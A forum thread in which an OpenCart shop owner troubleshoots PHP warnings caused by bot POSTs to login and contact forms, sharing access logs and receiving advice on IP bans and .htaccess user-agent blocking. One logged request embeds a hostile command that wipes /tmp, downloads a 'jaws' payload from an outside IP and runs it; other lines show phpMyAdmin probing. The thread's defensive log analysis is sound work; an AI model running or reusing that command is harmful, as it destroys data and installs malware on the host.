Post by SScott » Wed Aug 31, 2022 12:25 am

Hello and thank you in advance. Can someone please give me direction in what to look for on these errors? I get them daily and by the dozens.

2022-08-30 1:53:28 - PHP Warning: Undefined array key "password" in /home/****/public_html/catalog/controller/account/login.php on line 174
2022-08-30 1:53:28 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 177
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 160
2022-08-30 1:53:33 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/account/login.php on line 167
2022-08-30 1:53:36 - PHP Warning: Undefined array key "name" in /home/****/public_html/catalog/controller/information/contact.php on line 145
2022-08-30 1:53:36 - PHP Warning: Undefined array key "email" in /home/****/public_html/catalog/controller/information/contact.php on line 149
2022-08-30 1:53:36 - PHP Warning: Undefined array key "enquiry" in /home/****/public_html/catalog/controller/information/contact.php on line 153
2022-08-30 13:20:23 - PHP Warning: file_get_contents(https://www.google.com/recaptcha/api/siteverify?secret=****&response=&remoteip=91.211.89.207): Failed to open stream: Connection timed out in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 27
2022-08-30 13:20:23 - PHP Warning: Trying to access array offset on value of type null in /home/****/public_html/catalog/controller/extension/captcha/google.php on line 31

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Wed Aug 31, 2022 12:45 am

1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by straightlight » Wed Aug 31, 2022 8:33 am

SScott wrote:
Wed Aug 31, 2022 12:45 am
1. Version 3.0.3.8
2. None - Template/Theme
3. Several - (Additional) Installed Extension(s)
4. None - (Additional) Installed Translation(s)

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by paulfeakins » Wed Aug 31, 2022 6:22 pm

Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk


User avatar
Guru Member
Online

Posts

Joined
Mon Aug 22, 2011 11:01 pm
Location - London Gatwick, United Kingdom

Post by ADD Creative » Wed Aug 31, 2022 6:38 pm

Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Thu Sep 01, 2022 10:22 pm

paulfeakins wrote:
Wed Aug 31, 2022 6:22 pm
Probably various extensions.

One seems to be that your server might not be allowing you to make a request to Google's CAPTCHA.
How would I narrow it down to an ext? It is a dedi server and allows re-captcha on html pages I have built. Thank you kindly.
ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
I suspected this as well. I will see if I can find matching times. Thanks!

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Wed Sep 21, 2022 11:28 pm

ADD Creative wrote:
Wed Aug 31, 2022 6:38 pm
Could be a bot doing a POST to account/login without the email and password fields. Look in you web access logs for the same times.
Here is activity at the time of some of them. Any of this seem like the culprit?

104.248.8.32 - - [21/Sep/2022:09:33:08 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
40.94.29.194 - - [21/Sep/2022:09:34:25 -0500] "GET / HTTP/1.1" 301 239 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36"
59.55.189.71 - - [21/Sep/2022:09:44:12 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 301 310 "-" "Hello, world"
136.243.220.210 - - [21/Sep/2022:09:46:03 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot)"
103.147.64.43 - - [21/Sep/2022:09:48:47 -0500] "GET / HTTP/1.1" 301 235 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
80.94.92.239 - - [21/Sep/2022:09:51:29 -0500] "GET / HTTP/1.1" 301 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.131.66.209 - - [21/Sep/2022:09:54:22 -0500] "GET / HTTP/1.1" 301 231 "-" "curl/7.64.1"
107.173.40.211 - - [21/Sep/2022:09:54:25 -0500] "GET / HTTP/1.1" 301 239 "-" "python-requests/2.24.0"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/pma/scripts/setup.php HTTP/1.0" 301 256 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:57 -0500] "GET http://*.*.*.*:80/mysql/scripts/setup.php HTTP/1.0" 301 258 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 263 "-" "-"
182.254.225.35 - - [21/Sep/2022:09:56:58 -0500] "GET http://*.*.*.*:80/db/scripts/setup.php HTTP/1.0" 301 255 "-" "-"
107.167.35.138 - - [21/Sep/2022:09:57:46 -0500] "GET / HTTP/1.1" 301 239 "-" "-"

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by ADD Creative » Thu Sep 22, 2022 12:21 am

You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in you logs. That may be the wrong log file as all the responses are all 301 redirects, suggesting that is for http and not https.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Thu Sep 22, 2022 2:53 am

ADD Creative wrote:
Thu Sep 22, 2022 12:21 am
You would need to look for "POST /index.php?route=account/login" or "POST /index.php?route=information/contact" in you logs. That may be the wrong log file as all the responses are all 301 redirects, suggesting that is for http and not https.
Thank you!

You were right. I grabbed the most recent ones from the https version.

Here is the error in opencart:
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "password" in /home/*/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:55 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 177
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:56 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/account/login.php on line 167
2022-09-21 13:27:58 - PHP Warning: Undefined array key "name" in /home/*/public_html/catalog/controller/information/contact.php on line 145
2022-09-21 13:27:58 - PHP Warning: Undefined array key "email" in /home/*/public_html/catalog/controller/information/contact.php on line 149
2022-09-21 13:27:58 - PHP Warning: Undefined array key "enquiry" in /home/*/public_html/catalog/controller/information/contact.php on line 153
Here are the logs for that time:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:54 -0500] "GET /redacted HTTP/1.1" 200 13045 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9688 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/jquery/jquery-2.1.1.min.js HTTP/1.1" 200 29497 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 19882 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/stylesheet.css HTTP/1.1" 200 3507 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 7053 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/wide-grid.css HTTP/1.1" 200 347 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.css HTTP/1.1" 200 6863 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/vendor/isenselabs/isearch/isearch.css HTTP/1.1" 200 418 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu.css?v=30 HTTP/1.1" 200 3815 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style.css?v HTTP/1.1" 200 551 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/theme/default/stylesheet/msf/style-2.css?v HTTP/1.1" 200 - "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/so_megamenu/so_megamenu.js HTTP/1.1" 200 1877 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 9745 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/vendor/isenselabs/isearch/isearch.js HTTP/1.1" 200 5339 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/supermenu-responsive.js?v=30 HTTP/1.1" 200 1356 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/supermenu/jquery.hoverIntent.minified.js HTTP/1.1" 200 628 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/js_params.js?v HTTP/1.1" 200 208 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/bloodhound.min.js?v HTTP/1.1" 200 4476 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/typeahead.jquery.min.js?v HTTP/1.1" 200 8988 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/msf/live_search.min.js?v HTTP/1.1" 200 1343 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/common.js HTTP/1.1" 200 3029 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/DFSLOGO.jpg HTTP/1.1" 200 26898 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=extension/module/supermenu/css HTTP/1.1" 200 99 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/LeftBanner.jpg HTTP/1.1" 200 47856 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1050-228x228.png HTTP/1.1" 200 12505 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted1180-228x228.png HTTP/1.1" 200 7872 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted6470-228x228.png HTTP/1.1" 200 12716 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3410-228x228.png HTTP/1.1" 200 6535 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted345-228x228.png HTTP/1.1" 200 4200 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /catalog/view/javascript/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1" 200 77160 "redacted/catalog/view/javascript/font-awesome/css/font-awesome.min.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/UL366-228x228.png HTTP/1.1" 200 4676 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3100-228x228.png HTTP/1.1" 200 14316 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3110-228x228.png HTTP/1.1" 200 9147 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted3340-228x228.png HTTP/1.1" 200 6880 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "GET /index.php?route=information/contact HTTP/1.1" 200 9793 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/cache/catalog/redacted5150-228x228.png HTTP/1.1" 200 11959 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
50.204.25.186 - - [21/Sep/2022:13:27:55 -0500] "GET /image/catalog/cart.png HTTP/1.1" 404 83180 "redacted" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.42"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
Here is what I think is the offender?:
142.93.129.96 - - [21/Sep/2022:13:27:52 -0500] "GET / HTTP/1.1" 200 13568 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:53 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:54 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:55 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9615 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9616 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:56 -0500] "POST /index.php?route=account/login HTTP/1.1" 200 9701 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9866 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:58 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83411 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
142.93.129.96 - - [21/Sep/2022:13:27:59 -0500] "GET /index.php?route=information/redacted HTTP/1.1" 404 83425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by ADD Creative » Thu Sep 22, 2022 3:45 am

Does look like at bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other then that change the code in the controller to at least stop the error log filling up.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by SScott » Thu Sep 22, 2022 7:50 pm

ADD Creative wrote:
Thu Sep 22, 2022 3:45 am
Does look like at bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other then that change the code in the controller to at least stop the error log filling up.
I thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:

Code: Select all

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$ 
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.
Thank you sir. I will look into that right now.

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by SScott » Thu Sep 22, 2022 8:37 pm

JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.
@JNeuhoff does this look right for settings?

Image

Newbie

Posts

Joined
Wed Mar 26, 2014 9:19 pm

Post by JNeuhoff » Thu Sep 22, 2022 9:28 pm

@SScott : Yes, looks right to me. If you need help, contact us here.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


User avatar
Guru Member

Posts

Joined
Wed Dec 05, 2007 3:38 am


Post by ADD Creative » Thu Sep 22, 2022 11:23 pm

SScott wrote:
Thu Sep 22, 2022 7:50 pm
I thought I had it nailed down but looked and have a whole new set of IP's doing it. I added the lines below after some googling but it did not help:

Code: Select all

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$ 
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]
That will not work as the bot does set a user agent. To block that version of Chrome.

Code: Select all

SetEnvIfNoCase User-Agent "^.*Chrome/85\.0\.4183\.121.*$" bad_bot
Deny from env=bad_bot
Or to block old versions of Chrome.

Code: Select all

SetEnvIfNoCase User-Agent "^.*Chrome/[1-8][0-9]\..*$" bad_bot
Deny from env=bad_bot
Of course the bot could change its user agent just like the IP address.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by SScott » Wed Mar 29, 2023 12:40 am

I just wanted to update this instead of making a new thread. The site is just getting hammered by bots attempting to hack in. I can't find a solid way to stop it. For the ADMIN side I have it dialed in with an .htaccess file that will only allow the IP I specify to that section, it forwards all others to another website.

I installed a reCaptcha on the admin side and deleted the .htaccess file and got hammered hard so I re-uploaded the file to stop it.

